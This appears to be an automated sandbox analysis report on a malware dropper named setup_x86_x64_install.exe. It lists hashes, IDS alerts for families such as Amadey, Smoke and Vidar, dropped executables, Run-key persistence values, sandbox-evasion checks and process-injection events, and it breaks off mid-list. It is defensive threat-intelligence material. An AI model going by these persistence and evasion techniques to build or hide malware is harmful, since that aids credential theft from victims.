Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
902s -
max time network
1206s -
platform
windows11_x64 -
resource
win11 -
submitted
10-09-2021 12:06
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerUNdlL32.eXerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5284 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6784 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6092 4884 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4200 4884 rundll32.exe -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21a1ef054cac78a.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21a1ef054cac78a.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 38 IoCs
Processes:
WerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exetaskkill.exePING.EXEWerFault.exedllhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5504 created 4208 5504 WerFault.exe Thu21df5caa1b78de6.exe PID 5860 created 1132 5860 WerFault.exe Thu2164f292a11ce.exe PID 6000 created 456 6000 svchost.exe Thu21624565bb917a.exe PID 6020 created 2112 6020 WerFault.exe Thu214ce31cede21.exe PID 5536 created 5348 5536 rundll32.exe PID 5320 created 1404 5320 WerFault.exe ultramediaburner.exe PID 5284 created 1112 5284 WerFault.exe setup.exe PID 4172 created 4116 4172 WerFault.exe 2.exe PID 4608 created 5336 4608 WerFault.exe cmd.exe PID 6876 created 6804 6876 WerFault.exe schtasks.exe PID 6980 created 5524 6980 WerFault.exe Impedire.exe.com PID 5532 created 5712 5532 WerFault.exe 2218437.exe PID 6412 created 6516 6412 WerFault.exe Conhost.exe PID 7012 created 5020 7012 WerFault.exe cmd.exe PID 5160 created 6808 5160 WerFault.exe GcleanerEU.exe PID 2140 created 5608 2140 WerFault.exe gcleaner.exe PID 6160 created 3988 6160 WerFault.exe Conhost.exe PID 1224 created 6256 1224 WerFault.exe vdi_compiler.exe PID 748 created 1216 748 WerFault.exe askinstall45.exe PID 992 created 5264 992 WerFault.exe 028d53f5224f9cc8c60bd953504f1efa.exe PID 5844 created 5728 5844 cydo4oNKIvLkAEThaBw1zqxy.exe PID 784 created 4172 784 WerFault.exe 1Z0zZmTCS5oMVXRfdl0oicGa.exe PID 1948 created 5308 1948 taskkill.exe TuFgENVO9VJPbqex5eHA0cK1.exe PID 2660 created 1852 2660 PING.EXE _EGDhWSthk7tStn9F4Mb37kk.exe PID 3500 created 1372 3500 WerFault.exe XI82U9g2elUXtS3Xbpjnmnqs.exe PID 6248 created 6608 6248 dllhost.exe Ky9cjkHvbN1ZZPu6s15t_GEW.exe PID 4252 created 7016 4252 WerFault.exe PDbz91bUg9M7aGBRtrVqnWej.exe PID 2572 created 3828 2572 WerFault.exe Conhost.exe PID 2452 created 2608 2452 WerFault.exe 2985193.exe PID 1676 created 940 1676 WerFault.exe A710.exe PID 4068 created 1052 4068 WerFault.exe B48E.exe PID 6916 created 6400 6916 WerFault.exe 5EC.exe PID 2576 created 5236 2576 WerFault.exe 35A9.exe PID 5352 created 1808 5352 WerFault.exe 8748.exe PID 3060 created 3108 3060 WerFault.exe 7B41.exe PID 6032 created 3168 6032 WerFault.exe 94B7.exe PID 2148 created 3108 2148 WerFault.exe 7B41.exe PID 4064 created 3168 4064 WerFault.exe 94B7.exe -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Known Sinkhole Response Header
suricata: ET MALWARE Known Sinkhole Response Header
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral5/memory/2112-312-0x0000000004920000-0x00000000049F1000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 50 IoCs
Processes:
MsiExec.exeMsiExec.exepowershell.exeflow pid process 137 4136 MsiExec.exe 138 4136 MsiExec.exe 139 4136 MsiExec.exe 140 4136 MsiExec.exe 141 4136 MsiExec.exe 142 4136 MsiExec.exe 143 4136 MsiExec.exe 144 4136 MsiExec.exe 145 4136 MsiExec.exe 146 4136 MsiExec.exe 148 4136 MsiExec.exe 149 4136 MsiExec.exe 150 4136 MsiExec.exe 151 4136 MsiExec.exe 152 4136 MsiExec.exe 155 4136 MsiExec.exe 156 4136 MsiExec.exe 157 4136 MsiExec.exe 159 4136 MsiExec.exe 161 4136 MsiExec.exe 162 4136 MsiExec.exe 163 4136 MsiExec.exe 164 4136 MsiExec.exe 167 4136 MsiExec.exe 169 4136 MsiExec.exe 171 4136 MsiExec.exe 172 4136 MsiExec.exe 173 4136 MsiExec.exe 174 4136 MsiExec.exe 175 4136 MsiExec.exe 176 4136 MsiExec.exe 177 4136 MsiExec.exe 178 4136 MsiExec.exe 179 4136 MsiExec.exe 180 4136 MsiExec.exe 181 4136 MsiExec.exe 182 4136 MsiExec.exe 183 4136 MsiExec.exe 185 4136 MsiExec.exe 187 4136 MsiExec.exe 188 4136 MsiExec.exe 190 4136 MsiExec.exe 191 4136 MsiExec.exe 292 4044 MsiExec.exe 293 4044 MsiExec.exe 297 4044 MsiExec.exe 298 4044 MsiExec.exe 299 4044 MsiExec.exe 583 2032 powershell.exe 598 2032 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
Processes:
MSI50ED.tmp46807GHF____.exedescription ioc process File created C:\Windows\System32\drivers\SET15F0.tmp MSI50ED.tmp File opened for modification C:\Windows\System32\drivers\tap0901.sys MSI50ED.tmp File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe File opened for modification C:\Windows\System32\drivers\SET15F0.tmp MSI50ED.tmp -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeThu219d5fe8cf316.exeThu21624565bb917a.exeThu2164f292a11ce.exeThu21b9847cb6727.exeThu21a1ef054cac78a.exeThu21b93295136197.exeThu21df5caa1b78de6.exeThu2156de5489c19.exeThu214ce31cede21.exeThu214aaca5625.exeThu21568b0ab8.exeThu21b93295136197.tmpThu2102ff6cfe07c.exeThu214aaca5625.tmp46807GHF____.exe4205929.exetmpD1E1_tmp.exeLzmwAqmV.exeBearVpn 3.exeChrome 5.exeUltraMediaBurner.exe2.exesetup.execmd.exeSetup.exeConhost.exestats.exestats.tmpsetup_2.exe3002.exesetup_2.tmp8536432.exejhuuee.exeAdorarti.exe.com2218437.exesetup_2.exe4790483.exesvchost.exeLzmwAqmV.exe3002.exeAdorarti.exe.comT2qzzHJjB1IL.eXeBSKR.exe6548243.exeConhost.exeWerFault.exeDllHost.exeAdorarti.exe.comBSKR.exeHWI.exeFoxyIDM62s.exeHWI.exeultramediaburner.exeultramediaburner.tmpQishaelykunae.exeIDM1.tmpMortician.exesqtvvs.exeJoculoqoqu.exesqtvvs.exepid process 4932 setup_installer.exe 5056 setup_install.exe 1016 Thu219d5fe8cf316.exe 456 Thu21624565bb917a.exe 1132 Thu2164f292a11ce.exe 1076 Thu21b9847cb6727.exe 1404 Thu21a1ef054cac78a.exe 4600 Thu21b93295136197.exe 4208 Thu21df5caa1b78de6.exe 812 Thu2156de5489c19.exe 2112 Thu214ce31cede21.exe 2076 Thu214aaca5625.exe 2440 Thu21568b0ab8.exe 2492 Thu21b93295136197.tmp 4776 Thu2102ff6cfe07c.exe 4716 Thu214aaca5625.tmp 5296 46807GHF____.exe 5524 4205929.exe 5624 tmpD1E1_tmp.exe 5668 LzmwAqmV.exe 5904 BearVpn 3.exe 5972 Chrome 5.exe 6076 UltraMediaBurner.exe 4116 2.exe 1112 setup.exe 5336 cmd.exe 3640 Setup.exe 3976 Conhost.exe 5508 stats.exe 5716 stats.tmp 5784 setup_2.exe 5244 3002.exe 5268 setup_2.tmp 1248 8536432.exe 2984 jhuuee.exe 5904 BearVpn 3.exe 5896 Adorarti.exe.com 5712 2218437.exe 6036 setup_2.exe 5680 4790483.exe 6000 svchost.exe 5980 LzmwAqmV.exe 6004 3002.exe 4232 Adorarti.exe.com 3948 T2qzzHJjB1IL.eXe 6032 BSKR.exe 6280 6548243.exe 6516 Conhost.exe 6544 WerFault.exe 7092 DllHost.exe 7144 Adorarti.exe.com 6864 BSKR.exe 2544 HWI.exe 6164 FoxyIDM62s.exe 6432 HWI.exe 1404 ultramediaburner.exe 4924 ultramediaburner.tmp 4712 Qishaelykunae.exe 6560 IDM1.tmp 6076 UltraMediaBurner.exe 6116 Mortician.exe 3888 sqtvvs.exe 6388 Joculoqoqu.exe 5732 sqtvvs.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
MSIF803.tmp8536432.exeAZr9xQ9u1mCEAfl425CgkdJT.exeMSIF736.tmp23432445514.exesrvs.exeE718.exe2C51.exeWerFault.exeiYu3Ekh_kYp3VMkQ6F2XXrkp.exeCleaner.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSIF803.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8536432.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AZr9xQ9u1mCEAfl425CgkdJT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSIF736.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSIF736.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSIF803.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 23432445514.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8536432.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AZr9xQ9u1mCEAfl425CgkdJT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion srvs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E718.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E718.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2C51.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iYu3Ekh_kYp3VMkQ6F2XXrkp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 23432445514.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion srvs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2C51.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iYu3Ekh_kYp3VMkQ6F2XXrkp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Cleaner.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeThu21b93295136197.tmpThu214aaca5625.tmprundll32.exestats.tmpsetup_2.tmpsvchost.exerundll32.exeschtasks.exeMortician.exeinstaller.execmd.exeMsiExec.exeMsiExec.exeConhost.exeMsiExec.exeIBInstaller_74449.tmpsvrwebui.exeWerFault.exemask_svc.exeCleaner.exepid process 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 2492 Thu21b93295136197.tmp 2492 Thu21b93295136197.tmp 4716 Thu214aaca5625.tmp 5348 rundll32.exe 5716 stats.tmp 5716 stats.tmp 5268 setup_2.tmp 6000 svchost.exe 6776 rundll32.exe 6804 schtasks.exe 6116 Mortician.exe 1096 installer.exe 1096 installer.exe 5020 cmd.exe 1096 installer.exe 6156 MsiExec.exe 6156 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 4136 MsiExec.exe 3988 Conhost.exe 4136 MsiExec.exe 1096 installer.exe 4136 MsiExec.exe 4136 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 4136 MsiExec.exe 1408 IBInstaller_74449.tmp 1760 svrwebui.exe 1760 svrwebui.exe 1760 svrwebui.exe 1760 svrwebui.exe 1760 svrwebui.exe 1760 svrwebui.exe 1760 svrwebui.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 5832 mask_svc.exe 5832 mask_svc.exe 5832 mask_svc.exe 5832 mask_svc.exe 5832 mask_svc.exe 5832 mask_svc.exe 504 Cleaner.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
Processes:
srrvs.exemsedge.exeaipackagechainer.exeR7e45MRyLv4ZNZ766LqjNugG.exe4109789.exeCleaner_Installation.exetmpD1E1_tmp.exe46807GHF____.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce srrvs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" srrvs.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce R7e45MRyLv4ZNZ766LqjNugG.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" R7e45MRyLv4ZNZ766LqjNugG.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4109789.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Cleaner_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" Cleaner_Installation.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce tmpD1E1_tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" tmpD1E1_tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Bomaemuryzho.exe\"" 46807GHF____.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
8536432.exeAZr9xQ9u1mCEAfl425CgkdJT.exeCleaner.exeMSIF736.tmpMSIF803.tmpsrvs.exe2C51.exeiYu3Ekh_kYp3VMkQ6F2XXrkp.exe23432445514.exeE718.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8536432.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AZr9xQ9u1mCEAfl425CgkdJT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Cleaner.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSIF736.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSIF803.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA srvs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2C51.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iYu3Ekh_kYp3VMkQ6F2XXrkp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 23432445514.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E718.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Cleaner_Installation.exeinstaller.exemsiexec.exeMSIEXEC.EXEmsiexec.exedescription ioc process File opened (read-only) \??\A: Cleaner_Installation.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\U: MSIEXEC.EXE File opened (read-only) \??\V: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: Cleaner_Installation.exe File opened (read-only) \??\W: Cleaner_Installation.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\H: Cleaner_Installation.exe File opened (read-only) \??\N: Cleaner_Installation.exe File opened (read-only) \??\N: MSIEXEC.EXE File opened (read-only) \??\P: installer.exe File opened (read-only) \??\F: Cleaner_Installation.exe File opened (read-only) \??\T: MSIEXEC.EXE File opened (read-only) \??\R: Cleaner_Installation.exe File opened (read-only) \??\O: MSIEXEC.EXE File opened (read-only) \??\X: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: MSIEXEC.EXE File opened (read-only) \??\Y: MSIEXEC.EXE File opened (read-only) \??\M: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\W: MSIEXEC.EXE File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: Cleaner_Installation.exe File opened (read-only) \??\L: MSIEXEC.EXE File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: Cleaner_Installation.exe File opened (read-only) \??\P: Cleaner_Installation.exe File opened (read-only) \??\E: MSIEXEC.EXE File opened (read-only) \??\F: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\U: Cleaner_Installation.exe File opened (read-only) \??\A: MSIEXEC.EXE File opened (read-only) \??\Q: MSIEXEC.EXE File opened (read-only) \??\S: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: MSIEXEC.EXE File opened (read-only) \??\T: installer.exe File opened (read-only) \??\B: Cleaner_Installation.exe File opened (read-only) \??\K: Cleaner_Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: Cleaner_Installation.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: MSIEXEC.EXE File opened (read-only) \??\G: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 ipinfo.io 339 ipinfo.io 396 ipinfo.io 406 ipinfo.io 1 ipinfo.io 3 ip-api.com 45 ipinfo.io 322 ipinfo.io 322 ip-api.com -
Drops file in System32 directory 16 IoCs
Processes:
DrvInst.exetapinstall.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\SETFE23.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\SETFE24.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\SETFE24.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\SETFE22.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\SETFE22.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\SETFE23.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{72b218ec-cbd2-6d47-9b28-ae3978e2e667}\tap0901.cat DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
Processes:
8536432.exemask_svc.exeLJ7pNyk71vl83hwZtnkMkgRK.exemask_svc.exeAZr9xQ9u1mCEAfl425CgkdJT.exeiYu3Ekh_kYp3VMkQ6F2XXrkp.exeCleaner.exe23432445514.exe2C51.exeWerFault.exepid process 1248 8536432.exe 676 mask_svc.exe 4880 LJ7pNyk71vl83hwZtnkMkgRK.exe 5832 mask_svc.exe 6376 AZr9xQ9u1mCEAfl425CgkdJT.exe 6732 iYu3Ekh_kYp3VMkQ6F2XXrkp.exe 5328 Cleaner.exe 1640 23432445514.exe 2016 2C51.exe 4064 WerFault.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
BSKR.exeHWI.exesqtvvs.exeServices.exeservices64.exeMSIF803.tmpbWPeeD60Vsu4ib9lxUilR8TX.exepowershell.exe83D6.exe7B41.exe94B7.exedescription pid process target process PID 6032 set thread context of 6864 6032 BSKR.exe BSKR.exe PID 2544 set thread context of 6432 2544 HWI.exe HWI.exe PID 3888 set thread context of 5732 3888 sqtvvs.exe sqtvvs.exe PID 3092 set thread context of 6896 3092 Services.exe conhost.exe PID 6396 set thread context of 6840 6396 services64.exe explorer.exe PID 6576 set thread context of 2368 6576 MSIF803.tmp Fa8Hs3PWksjtS9XfeRowlh8S.exe PID 6216 set thread context of 456 6216 bWPeeD60Vsu4ib9lxUilR8TX.exe bWPeeD60Vsu4ib9lxUilR8TX.exe PID 6316 set thread context of 1328 6316 powershell.exe 97DC.exe PID 1408 set thread context of 6380 1408 83D6.exe 83D6.exe PID 3108 set thread context of 2568 3108 7B41.exe 7B41.exe PID 3168 set thread context of 2932 3168 